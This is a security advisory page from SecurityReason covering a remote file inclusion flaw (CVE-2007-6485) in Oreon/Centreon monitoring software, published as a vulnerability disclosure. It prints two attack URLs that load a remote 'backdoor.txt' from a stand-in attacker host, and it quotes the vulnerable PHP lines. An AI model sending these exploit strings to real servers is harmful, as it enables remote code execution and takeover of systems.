SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Oreon/Centreon - Multiple Remote File Inclusion


Arrow  SecurityAlert : 3472
Arrow  CVE : CVE-2007-6485
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : Michael Brooks
Arrow  Published : 21.12.2007

Arrow  Affected Software : 1.4(Oreon) and 1.4.1(Centreon)



Arrow  Advisory Content :  

By Michael Brooks

Vulnerability Type: Multiple Remote File Inclusion.

Software: Oreon and Centreon

Homepage:http://www.oreon-project.org/ or http://www.centreon.com/

Versions: 1.4(Oreon) and 1.4.1(Centreon)

The vulnerable file is:

./oreon-1.4/www/include/monitoring/engine/MakeXML.php

Another,virtually identical RFI:

./oreon-1.4/www/include/monitoring/engine/MakeXML4statusCounter.php

The attack:

http://127.0.0.1/include/monitoring/engine/MakeXML.php?fileOreonConf=htt
p://evilurl/backdoor.txt?

or

http://127.0.0.1/include/monitoring/engine/MakeXML4statusCounter.php?fil
eOreonConf=http://evilurl/backdoor.txt?

file MakeXML.php line 42 & 43:

include_once($oreonPath . "www/oreon.conf.php");

include_once($oreonPath . "www/include/common/common-Func-ACL.php");

Register_globals isn't needed for the taint:

file MakeXML.php line 28:

if (isset($_GET["fileOreonConf"]))

$oreonPath = $_GET["fileOreonConf"];

However magic_quotes_gpc is require for LFI because you need a null byte.

Peace






Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.